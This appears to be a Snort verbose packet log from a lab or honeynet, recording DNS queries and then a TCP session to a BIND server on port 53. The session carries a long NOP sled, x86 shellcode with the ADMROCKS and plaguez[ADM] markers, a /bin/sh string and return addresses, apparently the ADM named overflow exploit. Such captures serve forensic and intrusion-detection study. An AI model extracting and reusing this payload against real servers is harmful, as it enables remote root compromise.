No run mode specified, defaulting to verbose mode 10/27-12:40:25.044101 0:3:FD:FA:30:1C -> 0:50:56:49:0:41 type:0x800 len:0x4D 192.168.20.15:1032 -> 192.168.36.14:53 UDP TTL:63 TOS:0x0 ID:12278 IpLen:20 DgmLen:63 Len: 43 2C 86 00 00 00 01 00 00 00 00 00 00 06 6B 6C 6C ,............kll 61 69 30 06 68 6B 6E 74 65 63 03 6E 65 74 00 00 ai0.hkntec.net.. 06 00 01 ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:25.046093 0:50:56:49:0:41 -> 0:3:FD:FA:30:1C type:0x800 len:0xC9 192.168.36.14:53 -> 192.168.20.15:1032 UDP TTL:64 TOS:0x0 ID:35262 IpLen:20 DgmLen:187 Len: 167 2C 86 84 80 00 01 00 01 00 02 00 02 06 6B 6C 6C ,............kll 61 69 30 06 68 6B 6E 74 65 63 03 6E 65 74 00 00 ai0.hkntec.net.. 06 00 01 C0 0C 00 06 00 01 00 00 70 80 00 30 02 ...........p..0. 6E 73 C0 0C 06 6B 6C 6C 61 69 30 02 69 65 04 63 ns...kllai0.ie.c 75 68 6B 03 65 64 75 02 68 6B 00 77 46 3B AE 00 uhk.edu.hk.wF;.. 00 01 2C 00 00 00 3C 00 09 3A 80 00 00 70 80 C0 ..,...<..:...p.. 0C 00 02 00 01 00 00 70 80 00 02 C0 2F C0 0C 00 .......p..../... 02 00 01 00 00 70 80 00 06 03 6E 73 32 C0 0C C0 .....p....ns2... 2F 00 01 00 01 00 00 70 80 00 04 C0 A8 24 0E C0 /......p.....$.. 79 00 01 00 01 00 00 70 80 00 04 C0 A8 14 0F y......p....... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:54.969980 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x53 192.168.20.14:1492 -> 192.168.36.26:53 UDP TTL:63 TOS:0x0 ID:18291 IpLen:20 DgmLen:69 Len: 49 5E CF 01 00 00 01 00 00 00 00 00 00 03 77 77 77 ^............www 06 68 61 63 6B 65 72 08 63 61 70 74 75 72 65 64 .hacker.captured 03 63 6F 6D 00 00 01 00 01 .com..... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:54.972039 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x53 192.168.36.26:1032 -> 192.168.20.11:53 UDP TTL:64 TOS:0x0 ID:13884 IpLen:20 DgmLen:69 Len: 49 D6 BB 00 00 00 01 00 00 00 00 00 00 03 77 77 77 .............www 06 68 61 63 6B 65 72 08 63 61 70 74 75 72 65 64 .hacker.captured 03 63 6F 6D 00 00 01 00 01 .com..... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:54.983149 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x4A 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48728 IpLen:20 DgmLen:60 DF ******S* Seq: 0xA7F881FC Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 136971605 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:54.983547 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x4A 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13885 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0xA47F9734 Ack: 0xA7F881FD Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 78345698 136971605 NOP TCP Options => WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:54.984125 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48729 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F881FD Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971605 78345698 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:54.986587 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x44 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48730 IpLen:20 DgmLen:54 DF ***AP*** Seq: 0xA7F881FD Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971605 78345698 19 E3 .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:54.986689 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13886 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA47F9735 Ack: 0xA7F881FF Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78345698 136971605 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:54.986631 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x5EA 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48731 IpLen:20 DgmLen:1500 DF ***AP*** Seq: 0xA7F881FF Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971605 78345698 D6 BB 84 00 00 01 00 01 00 00 00 01 03 77 77 77 .............www 06 68 61 63 6B 65 72 08 63 61 70 74 75 72 65 64 .hacker.captured 03 63 6F 6D 00 00 01 00 01 03 77 77 77 06 68 61 .com......www.ha 63 6B 65 72 08 63 61 70 74 75 72 65 64 03 63 6F cker.captured.co 6D 00 00 01 00 01 00 00 01 2C 00 04 01 02 03 04 m........,...... 03 77 77 77 06 68 61 63 6B 65 72 08 63 61 70 74 .www.hacker.capt 75 72 65 64 03 63 6F 6D 00 00 1E 00 01 00 00 01 ured.com........ 2C 19 6B 00 06 61 64 6D 61 64 6D 00 00 90 90 90 ,.k..admadm..... 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 ........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:54.989826 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13887 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA47F9735 Ack: 0xA7F887A7 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78345699 136971605 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:54.989753 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x5EA 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48732 IpLen:20 DgmLen:1500 DF ***AP*** Seq: 0xA7F887A7 Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971606 78345698 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 ........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:54.989789 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x5EA 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48733 IpLen:20 DgmLen:1500 DF ***AP*** Seq: 0xA7F88D4F Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971606 78345698 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 E9 AC 01 00 00 5E 89 ..............^. 76 0C 8D 46 08 89 46 10 8D 46 2E 89 46 14 56 EB v..F..F..F..F.V. 54 5E 89 F3 B9 00 00 00 00 BA 00 00 00 00 B8 05 T^.............. 00 00 00 CD 80 50 8D 5E 02 B9 FF 01 00 00 B8 27 .....P.^.......' 00 00 00 CD 80 8D 5E 02 B8 3D 00 00 00 CD 80 5B ......^..=.....[ 53 B8 85 00 00 00 CD 80 5B B8 06 00 00 00 CD 80 S.......[....... 8D 5E 0B B8 0C 00 00 00 CD 80 89 F3 B8 3D 00 00 .^...........=.. 00 CD 80 EB 2C E8 A7 FF FF FF 2E 00 41 44 4D 52 ....,.......ADMR 4F 43 4B 53 00 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E OCKS.../../../.. 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F /../../../../../ 00 5E B8 02 00 00 00 CD 80 89 C0 85 C0 0F 85 8E .^.............. 00 00 00 89 F3 8D 4E 0C 8D 56 18 B8 0B 00 00 00 ......N..V...... CD 80 B8 01 00 00 00 CD 80 E8 75 00 00 00 10 00 ..........u..... 00 00 00 00 00 00 74 68 69 73 69 73 73 6F 6D 65 ......thisissome 74 65 6D 70 73 70 61 63 65 66 6F 72 74 68 65 73 tempspaceforthes 6F 63 6B 69 6E 61 64 64 72 69 6E 79 65 61 68 79 ockinaddrinyeahy 65 61 68 69 6B 6E 6F 77 74 68 69 73 69 73 6C 61 eahiknowthisisla 6D 65 62 75 74 61 6E 79 77 61 79 77 68 6F 63 61 mebutanywaywhoca 72 65 73 68 6F 72 69 7A 6F 6E 67 6F 74 69 74 77 reshorizongotitw 6F 72 6B 69 6E 67 73 6F 61 6C 6C 69 73 63 6F 6F orkingsoalliscoo 6C EB 86 5E 56 8D 46 08 50 8B 46 04 50 FF 46 04 l..^V.F.P.F.P.F. 89 E1 BB 07 00 00 00 B8 66 00 00 00 CD 80 83 C4 ........f....... 0C 89 C0 85 C0 75 DA 66 83 7E 08 02 75 D3 8B 56 .....u.f.~..u..V 04 4A 52 89 D3 B9 00 00 00 00 B8 3F 00 00 00 CD .JR........?.... 80 5A 52 89 D3 B9 01 00 00 00 B8 3F 00 00 00 CD .ZR........?.... 80 5A 52 89 D3 B9 02 00 00 00 B8 3F 00 00 00 CD .ZR........?.... 80 EB 12 5E 46 46 46 46 46 C7 46 10 00 00 00 00 ...^FFFFF.F..... E9 FE FE FF FF E8 E9 FF FF FF E8 4F FE FF FF 2F ...........O.../ 62 69 6E 2F 73 68 00 2D 63 00 FF FF FF FF FF FF bin/sh.-c....... FF FF FF FF FF FF FF 00 00 00 00 70 6C 61 67 75 ...........plagu 65 7A 5B 41 44 4D 5D 31 30 2F 39 39 2D 65 78 69 ez[ADM]10/99-exi 74 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 t............... 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 ................ D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 ................ D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 ................ D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 ................ D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 ................ D6 FF BF 00 00 00 00 00 ........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:54.989990 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13888 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA47F9735 Ack: 0xA7F892F7 Win: 0x76C8 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78345699 136971606 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:54.999880 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x5EA 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48734 IpLen:20 DgmLen:1500 DF ***AP*** Seq: 0xA7F892F7 Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971606 78345699 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 